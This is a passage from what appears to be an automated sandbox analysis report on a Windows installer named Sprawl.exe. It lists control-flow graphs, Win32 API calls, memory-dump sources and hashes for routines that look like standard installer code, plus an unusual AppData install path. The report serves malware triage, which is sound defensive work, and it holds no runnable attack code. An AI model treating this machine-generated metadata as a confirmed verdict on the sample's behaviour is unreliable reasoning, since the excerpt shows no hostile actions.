218 404aa7-404ab6 SendMessageA 212->218 219 404ab8-404ace SendMessageA 212->219 213->200 214->149 215->216 216->202 218->200 219->200 234 404da6-404db1 230->234 231->176 233 404e55-404e64 call 4047e6 call 4047ce 231->233 233->176 238 404db3-404dc2 234->238 239 404e27-404e39 234->239 236->206 242 404d5d 237->242 243 404d5e-404d61 237->243 240 404dc4-404dd1 238->240 241 404dd5-404dd8 238->241 239->231 239->234 240->241 245 404dda-404ddd 241->245 246 404ddf-404de8 241->246 242->243 243->236 243->237 248 404ded-404e25 SendMessageA * 2 245->248 246->248 249 404dea 246->249 248->239 249->248
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                                                            • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                                                                            • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404CE4
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404CF4
                                                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                            • String ID: $(N$M$N
                                                                                                                            • API String ID: 1638840714-1749088486
                                                                                                                            • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                                            • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                                                            • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                                            • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 427 404352-40437c 428 40437e-40438a call 405509 call 405f9a 427->428 429 40438f-404399 427->429 428->429 431 404407-40440e 429->431 432 40439b-4043b1 GetDlgItem call 40580e 429->432 435 404414-40441d 431->435 436 4044e5-4044ec 431->436 443 4043c3-4043fc SetWindowTextA call 403f14 * 2 call 403f49 call 4060c8 432->443 444 4043b3-4043bb call 40583a 432->444 439 404437-40443c 435->439 440 40441f-40442a 435->440 441 4044fb-404516 call 405509 call 40588f 436->441 442 4044ee-4044f5 436->442 439->436 447 404442-404484 call 405d51 SHBrowseForFolderA 439->447 445 404430 440->445 446 40468e-4046a0 call 403f7b 440->446 465 404518 441->465 466 40451f-404537 call 405d2f call 4060c8 441->466 442->441 442->446 443->446 485 404402-404405 SHAutoComplete 443->485 444->443 463 4043bd-4043be call 4057a1 444->463 445->439 459 404486-4044a0 CoTaskMemFree call 4057a1 447->459 460 4044de 447->460 472 4044a2-4044a8 459->472 473 4044ca-4044dc SetDlgItemTextA 459->473 460->436 463->443 465->466 483 404539-40453f 466->483 484 40456e-40457f call 405d2f call 40583a 466->484 472->473 476 4044aa-4044c1 call 405d51 lstrcmpiA 472->476 473->436 476->473 487 4044c3-4044c5 lstrcatA 476->487 483->484 488 404541-404553 GetDiskFreeSpaceExA 483->488 499 404581 484->499 500 404584-40459d GetDiskFreeSpaceA 484->500 485->431 487->473 490 404555-404557 488->490 491 4045c6-4045e0 488->491 494 404559 490->494 495 40455b-40456c call 4057e8 490->495 493 4045e2 491->493 497 4045e7-4045f1 call 4047e6 493->497 494->495 495->484 495->488 505 4045f3-4045fa 497->505 506 40460c-404615 497->506 499->500 500->493 503 40459f-4045c4 MulDiv 500->503 503->497 505->506 509 4045fc 505->509 507 404647-404651 506->507 508 404617-404627 call 4047ce 506->508 511 404653-40465a call 40140b 507->511 512 40465d-404663 507->512 520 404639-404642 SetDlgItemTextA 508->520 521 404629-404637 call 404709 508->521 513 404605 509->513 514 4045fe-404603 509->514 511->512 517 404665 512->517 518 404668-404679 call 403f36 512->518 513->506 514->506 514->513 517->518 525 404688 518->525 526 40467b-404681 518->526 520->507 521->507 525->446 526->525 528 404683 call 4042e7 526->528 528->525
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001,00000006,00000000,?,00000014,?,?,00000001,?), ref: 00404405
                                                                                                                            • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                                                            • lstrcmpiA.KERNEL32(Space available: ,00429868), ref: 004044B9
                                                                                                                            • lstrcatA.KERNEL32(?,Space available: ), ref: 004044C5
                                                                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                                                              • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Sprawl.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\Sprawl.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                                              • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                                            • GetDiskFreeSpaceExA.KERNELBASE(C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,?,?,00000001,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,?,000003FB,?), ref: 0040454E
                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,?,0000040F,?,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,00000001,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,?,000003FB,?), ref: 00404595
                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                                                              • Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                                              • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                                                              • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                            • String ID: (N$A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Space available:
                                                                                                                            • API String ID: 4039761011-3582746545
                                                                                                                            • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                                                            • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                                            • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                                                            • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 597 405d51-405d5c 598 405d5e-405d6d 597->598 599 405d6f-405d84 597->599 598->599 600 405f77-405f7b 599->600 601 405d8a-405d95 599->601 602 405f81-405f8b 600->602 603 405da7-405db1 600->603 601->600 604 405d9b-405da2 601->604 605 405f96-405f97 602->605 606 405f8d-405f91 call 405d2f 602->606 603->602 607 405db7-405dbe 603->607 604->600 606->605 609 405dc4-405df9 607->609 610 405f6a 607->610 611 405f14-405f17 609->611 612 405dff-405e0a GetVersion 609->612 613 405f74-405f76 610->613 614 405f6c-405f72 610->614 617 405f47-405f4a 611->617 618 405f19-405f1c 611->618 615 405e24 612->615 616 405e0c-405e10 612->616 613->600 614->600 622 405e2b-405e32 615->622 616->615 619 405e12-405e16 616->619 623 405f58-405f68 lstrlenA 617->623 624 405f4c-405f53 call 405d51 617->624 620 405f2c-405f38 call 405d2f 618->620 621 405f1e-405f2a call 405c8d 618->621 619->615 625 405e18-405e1c 619->625 635 405f3d-405f43 620->635 621->635 627 405e34-405e36 622->627 628 405e37-405e39 622->628 623->600 624->623 625->615 631 405e1e-405e22 625->631 627->628 633 405e72-405e75 628->633 634 405e3b-405e5e call 405c16 628->634 631->622 638 405e85-405e88 633->638 639 405e77-405e83 GetSystemDirectoryA 633->639 646 405e64-405e6d call 405d51 634->646 647 405efb-405eff 634->647 635->623 637 405f45 635->637 644 405f0c-405f12 call 405f9a 637->644 641 405ef2-405ef4 638->641 642 405e8a-405e98 GetWindowsDirectoryA 638->642 640 405ef6-405ef9 639->640 640->644 640->647 641->640 645 405e9a-405ea4 641->645 642->641 644->623 650 405ea6-405ea9 645->650 651 405ebe-405ed4 SHGetSpecialFolderLocation 645->651 646->640 647->644 653 405f01-405f07 lstrcatA 647->653 650->651 654 405eab-405eb2 650->654 655 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 651->655 656 405eef 651->656 653->644 658 405eba-405ebc 654->658 655->640 655->656 656->641 658->640 658->651
                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
                                                                                                                            • GetSystemDirectoryA.KERNEL32(Space available: ,00000400), ref: 00405E7D
                                                                                                                            • GetWindowsDirectoryA.KERNEL32(Space available: ,00000400), ref: 00405E90
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
                                                                                                                            • SHGetPathFromIDListA.SHELL32(0041C205,Space available: ), ref: 00405EDA
                                                                                                                            • CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
                                                                                                                            • lstrcatA.KERNEL32(Space available: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                                                            • lstrlenA.KERNEL32(Space available: ,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                            • String ID: (N$Software\Microsoft\Windows\CurrentVersion$Space available: $\Microsoft\Internet Explorer\Quick Launch
                                                                                                                            • API String ID: 900638850-2320315919
                                                                                                                            • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                                                            • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                                                            • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                                                            • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 659 4055d1-4055f7 call 40588f 662 405610-405617 659->662 663 4055f9-40560b DeleteFileA 659->663 665 405619-40561b 662->665 666 40562a-40563a call 405d2f 662->666 664 40579a-40579e 663->664 667 405621-405624 665->667 668 405748-40574d 665->668 674 405649-40564a call 4057e8 666->674 675 40563c-405647 lstrcatA 666->675 667->666 667->668 668->664 670 40574f-405752 668->670 672 405754-40575a 670->672 673 40575c-405764 call 406033 670->673 672->664 673->664 682 405766-40577a call 4057a1 call 405589 673->682 677 40564f-405652 674->677 675->677 680 405654-40565b 677->680 681 40565d-405663 lstrcatA 677->681 680->681 683 405668-405686 lstrlenA FindFirstFileA 680->683 681->683 698 405792-405795 call 404f48 682->698 699 40577c-40577f 682->699 684 40568c-4056a3 call 4057cc 683->684 685 40573e-405742 683->685 692 4056a5-4056a9 684->692 693 4056ae-4056b1 684->693 685->668 689 405744 685->689 689->668 692->693 695 4056ab 692->695 696 4056b3-4056b8 693->696 697 4056c4-4056d2 call 405d2f 693->697 695->693 701 4056ba-4056bc 696->701 702 40571d-40572f FindNextFileA 696->702 709 4056d4-4056dc 697->709 710 4056e9-4056f4 call 405589 697->710 698->664 699->672 704 405781-405790 call 404f48 call 405bea 699->704 701->697 705 4056be-4056c2 701->705 702->684 707 405735-405738 FindClose 702->707 704->664 705->697 705->702 707->685 709->702 713 4056de-4056e7 call 4055d1 709->713 718 405715-405718 call 404f48 710->718 719 4056f6-4056f9 710->719 713->702 718->702 721 4056fb-40570b call 404f48 call 405bea 719->721 722 40570d-405713 719->722 721->702 722->702
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNELBASE(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                                            • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                                            • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                                            • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                                            Strings
                                                                                                                            • "C:\Users\user\Desktop\Sprawl.exe", xrefs: 004055D1
                                                                                                                            • \*.*, xrefs: 0040563C
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                            • API String ID: 2035342205-25746555
                                                                                                                            • Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                                                            • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                                                            • Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                                                            • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNELBASE(76233410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 0040604A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                                            • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                                                                            • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                                            • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 250 403a41-403a53 251 403b94-403ba3 250->251 252 403a59-403a5f 250->252 254 403bf2-403c07 251->254 255 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 251->255 252->251 253 403a65-403a6e 252->253 256 403a70-403a7d SetWindowPos 253->256 257 403a83-403a86 253->257 259 403c47-403c4c call 403f60 254->259 260 403c09-403c0c 254->260 255->254 256->257 262 403aa0-403aa6 257->262 263 403a88-403a9a ShowWindow 257->263 267 403c51-403c6c 259->267 265 403c0e-403c19 call 401389 260->265 266 403c3f-403c41 260->266 268 403ac2-403ac5 262->268 269 403aa8-403abd DestroyWindow 262->269 263->262 265->266 287 403c1b-403c3a SendMessageA 265->287 266->259 272 403ee1 266->272 273 403c75-403c7b 267->273 274 403c6e-403c70 call 40140b 267->274 278 403ac7-403ad3 SetWindowLongA 268->278 279 403ad8-403ade 268->279 276 403ebe-403ec4 269->276 275 403ee3-403eea 272->275 283 403c81-403c8c 273->283 284 403e9f-403eb8 DestroyWindow EndDialog 273->284 274->273 276->272 281 403ec6-403ecc 276->281 278->275 285 403b81-403b8f call 403f7b 279->285 286 403ae4-403af5 GetDlgItem 279->286 281->272 289 403ece-403ed7 ShowWindow 281->289 283->284 290 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 283->290 284->276 285->275 291 403b14-403b17 286->291 292 403af7-403b0e SendMessageA IsWindowEnabled 286->292 287->275 289->272 320 403ce1-403ce6 290->320 321 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 290->321 295 403b19-403b1a 291->295 296 403b1c-403b1f 291->296 292->272 292->291 298 403b4a-403b4f call 403eed 295->298 299 403b21-403b27 296->299 300 403b2d-403b32 296->300 298->285 301 403b68-403b7b SendMessageA 299->301 302 403b29-403b2b 299->302 300->301 303 403b34-403b3a 300->303 301->285 302->298 306 403b51-403b5a call 40140b 303->306 307 403b3c-403b42 call 40140b 303->307 306->285 317 403b5c-403b66 306->317 316 403b48 307->316 316->298 317->316 320->321 324 403d27-403d28 321->324 325 403d2a 321->325 326 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 324->326 325->326 327 403d5c-403d6d SendMessageA 326->327 328 403d6f 326->328 329 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 327->329 328->329 329->267 338 403db4-403db6 329->338 338->267 339 403dbc-403dc0 338->339 340 403dc2-403dc8 339->340 341 403ddf-403df3 DestroyWindow 339->341 340->272 342 403dce-403dd4 340->342 341->276 343 403df9-403e26 CreateDialogParamA 341->343 342->267 344 403dda 342->344 343->276 345 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 343->345 344->272 345->272 350 403e85-403e98 ShowWindow call 403f60 345->350 352 403e9d 350->352 352->276
                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                                                            • ShowWindow.USER32(?), ref: 00403A9A
                                                                                                                            • DestroyWindow.USER32 ref: 00403AAE
                                                                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403BB4
